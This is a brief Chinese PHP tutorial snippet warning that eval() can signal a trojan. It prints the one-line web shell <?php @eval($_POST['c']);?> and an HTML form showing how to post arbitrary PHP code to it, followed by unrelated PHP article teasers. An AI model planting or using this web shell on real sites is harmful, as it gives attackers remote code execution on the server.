eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马
就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
以上所述就是本文的全部内容了,希望大家能够喜欢。
本文实例讲述了php实现字符串翻转的方法。分享给大家供大家参考。具体实现方法如下: <?php header("content-type:text/html;chars...
本文实例讲述了PHP封装的分页类与简单用法。分享给大家供大家参考,具体如下: 分页类的封装如下: page.php <?php //showPage(页号,总页数,分隔...
其中有一组映射到 SWF 动画中的数据类型的对象:子图形、图形、文本、位图等等。在本文中,我使用了预编译的扩展 php_ming.dll 库用于 Windows 版本的 PHP。 清单...
通过这节课, 1.了解AppServ的目录结构 2.我们可以了解PHP的基本语法结构 1 我的AppServ安装目录是E盘: ①运用命令行的方式去操作apache服务器 apache服...
本文实例讲述了PHP中功能强大却很少使用的函数。分享给大家供大家参考,具体如下: call_user_func_array — 让参数以数组的形式调用一个函数 call_user_fun...